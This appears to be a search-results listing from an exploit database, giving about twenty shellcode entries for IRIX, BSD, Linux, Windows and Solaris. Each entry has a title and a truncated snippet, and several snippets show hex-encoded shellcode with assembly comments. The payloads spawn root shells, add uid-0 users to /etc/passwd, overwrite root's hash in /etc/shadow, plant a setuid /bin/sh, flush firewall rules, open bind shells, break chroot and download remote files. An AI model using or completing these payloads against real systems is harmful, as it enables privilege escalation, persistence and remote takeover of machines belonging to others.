7259 matches found
IRIX - execve(/bin/sh -c) Shellcode (72 bytes)
IRIX - execve/bin/sh -c Shellcode 72 bytes. Shellcode exploit for IRIX platform char cmdshellcode= "\x04\x10\xff\xff" / bltzal $zero, / "\x24\x02\x03\xf3" / li $v0,1011 / "\x23\xff\x08\xf4" / addi $ra,$ra,2292 / "\x23\xe4\xf7\x40" / addi $a0,$ra,-2240 / "\x23\xe5\xfb\x24" / addi $a1,$ra,-1244 /...
BSD/x86 - execve(/bin/sh) Shellcode (28 bytes)
BSD/x86 - execve/bin/sh Shellcode 28 bytes. Shellcode exploit for BSDx86 platform / simply execvebinsh shellcode in 28 bytes written on nasm - my first nasm exp. greetz2: mig darknet /EFnet.org dev0id rus-sec /EFnet.org rootteam.void.ru / char shellcode =...
Linux/StrongARM - setuid() Shellcode (20 bytes)
Linux/StrongARM - setuid Shellcode 20 bytes. Shellcode exploit for ARM platform / 20 byte StrongARM/Linux setuid shellcode funkysh / char shellcode= "\x02\x20\x42\xe0" / sub r2, r2, r2 / "\x04\x10\x8f\xe2" / add r1, pc, 4 / "\x12\x02\xa0\xe1" / mov r0, r2, lsl r2 / "\x01\x20\xc1\xe5" / strb r2, r...
Windows/x86 (XP Professional SP2) (English) - Wordpad.exe Shellcode (15 bytes)
Windows/x86 XP Professional SP2 English - Wordpad.exe Shellcode 15 bytes. Shellcode exploit for Windowsx86 platform. Tags: Metasploit Framework MSF +-------------------------------------------------+ | Windows XP Pro Sp2 English "Wordpad" Shellcode. |...
Linux/x86 - Socket-proxy Shellcode (372 bytes) (Generator)
Linux/x86 - Socket-proxy Shellcode 372 bytes Generator. Shellcode exploit for Generator platform /--------------------------------------------------------------------------- 372 byte socket-proxy shellcode by Russell Sanford - [email protected]...
IRIX - stdin-read Shellcode (40 bytes)
IRIX - stdin-read Shellcode 40 bytes. Shellcode exploit for IRIX platform / 40 byte MIPS/Irix PIC stdin-read shellcode. -scut/teso / unsigned long int shellcode = 0x24048cb0, / li $a0, -0x7350 / / dpatch: / 0x0490ffff, / bltzal $a0, dpatch / 0x2804ffff, / slti $a0, $zero, -1 / 0x240fffe3, / li $t...
BSD/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)
BSD/x86 - Write to /etc/passwd with uid0 + gid0 Shellcode 74 bytes. Shellcode exploit for BSDx86 platform / writes the line for user in /etc/passwd with uid&gid == 0 OS: BSD length: 74 written by dev0id [email protected] rootteam.void.ru rus-sec /Efnet.org greetz: mig nerf BITS 32 main: xor eax,eax...
Linux/x86 - fork() + setreuid(0, 0) + execve(cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh) Shellcode (126 bytes)
Linux/x86 - fork + setreuid0, 0 + execvecp /bin/sh /tmp/sh; chmod 4755 /tmp/sh Shellcode 126 bytes. Shellcode exploit for Linuxx86 platform / linux/x86 shamelessly ripped from one of my unpublished exploits / / fork's, does setreuid0, 0; then execve's: /bin/sh -c "cp /bin/sh /tmp/sh; chmod 4755...
Linux/x86 - pwrite(/etc/shadow, (md5 hash of agix), 32, 8) Shellcode (89 bytes)
Linux/x86 - pwrite/etc/shadow, md5 hash of agix, 32, 8 Shellcode 89 bytes. Shellcode exploit for Linuxx86 platform / | Title: Linux/x86 pwrite"/etc/shadow", hash, 32, 8 Shellcode 89 Bytes | Description: replace root's password with hash of "agix" in MD5 | Type: Shellcode | Author: agix | Platform...
Linux/x86 - setuid(0) + execve(/bin/sh, 0, 0) Shellcode (27 bytes)
Linux/x86 - setuid0 + execve/bin/sh, 0, 0 Shellcode 27 bytes. Shellcode exploit for Linuxx86 platform include include / by Magnefikko 24.04.2010 [email protected] Promhyl Studies :: http://promhyl.oz.pl Subgroup: PRekambr Name: 27 bytes setuid0 ^ execve"/bin/sh", 0, 0 shellcode Platform: Linux...
Linux/x86 - Remote File Download Shellcode (42 bytes)
Linux/x86 - Remote File Download Shellcode 42 bytes. Shellcode exploit for Linuxx86 platform / Title: Linux x86 - Remote file Download - 42 bytes Author: Jonathan Salwan Web: http://www.shell-storm.org Twitter: http://twitter.com/jonathansalwan !Database of Shellcodes...
BSD/x86 - Break chroot (../ 10x Loop) Shellcode (40 bytes)
BSD/x86 - Break chroot ../ 10x Loop Shellcode 40 bytes. Shellcode exploit for BSDx86 platform / One of the smallest chroot shellcodes it will put '../' 10 times Size 40 bytes OS BSD /rootteam/dev0id rootteam.void.ru [email protected] BITS 32 jmp short callme main: pop esi mov edi,esi xor...
Windows/x86 (NT/XP/2000/2003) - Bind TCP (8721/TCP) Shell Shellcode (356 bytes)
Windows/x86 NT/XP/2000/2003 - Bind TCP 8721/TCP Shell Shellcode 356 bytes. Shellcode exploit for Windowsx86 platform ; Title: Win32 Bind Shell ; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 ; Function: Listen for connection and spawn command shell ; Author: hdmatmetasploit.co...
Linux/x86 - execve(/bin/dash) Shellcode (49 bytes)
Linux/x86 - execve/bin/dash Shellcode 49 bytes. Shellcode exploit for Linuxx86 platform / Shellcode length: 49 Author: Chroniccommand /bin/dash My first attempt at shellcode Poison security / include //49 bytes char shellcode = "\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a"...
Linux/x86 - setuid(0) + execve("/bin/sh",0,0) Shellcode (28 bytes)
Linux/x86 - setuid0 + execve"/bin/sh",0,0 Shellcode 28 bytes. Shellcode exploit for Linuxx86 platform / linux/x86 setuid0 & execve"/bin/sh",0,0 28 bytes http://www.gonullyourself.org sToRm I made this, because http://www.milw0rm.com/shellcode/7115 felt the need to express his "superior" 28-byte...
Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) + exit() Shellcode (64 bytes)
Linux/x86 - Flush IPChains Rules /sbin/ipchains -F + exit Shellcode 64 bytes. Shellcode exploit for Linuxx86 platform / The shellcode flushs the ipchains table by running /sbin/ipchains -F then exit greetz to zilion: man, my code is shorter! size = 64 bytes OS = Linux i386 written by...
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd,shadow} Shellcode (273 bytes)
Linux/x86-64 - Add User pwned/$pass$ Using echo cmd To /etc/passwd,shadow Shellcode 273 bytes. Shellcode exploit for Linuxx86-64 platform ; shellcode name adduserpassword ; Author : Christophe G SLAE64-1337 ; Len : 273 bytes ; Language : Nasm ; "name = pwned ; pass = $pass$" ; add user and passwo...
Solaris/SPARC - Bind TCP (2001/TCP) Shell (/bin/sh) Shellcode
Solaris/SPARC - Bind TCP 2001/TCP Shell /bin/sh Shellcode. Shellcode exploit for SolarisSPARC platform !!! $Id: sparc-bind.s,v 1.1 2003/03/01 01:10:51 ghandi Exp $ !!! Bind /bin/sh to TCP port 2001. Calls setuid0 so /bin/sh won't !!! drop privileges. After assembly, change the third byte in the !...
Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes)
Linux/x86-64 - Execute /bin/sh Shellcode 27 bytes. Shellcode exploit for Linuxx86-64 platform / Execute /bin/sh - 27 bytes Dad 0x7ffff7aeff20 : mov eax,0x3b ; 0x7ffff7aeff25 : syscall ; main: ;mov rbx, 0x68732f6e69622f2f ;mov rbx, 0x68732f6e69622fff ;shr rbx, 0x8 ;mov rax, 0xdeadbeefcafe1dea ;mov...
Linux/x86 - setreuid(0,0) + execve("/bin/ksh", [/bin/ksh, NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid0,0 + execve"/bin/ksh", /bin/ksh, NULL + XOR Encoded Shellcode 53 bytes. Shellcode exploit for Linuxx86 platform Title: Linux x86 setreuid 0,0 & execve"/bin/ksh", "/bin/ksh", NULL + XOR encoded - 53 bytes Author: egeektronic Twitter: @egeektronic Tested on: Slackware 13.37...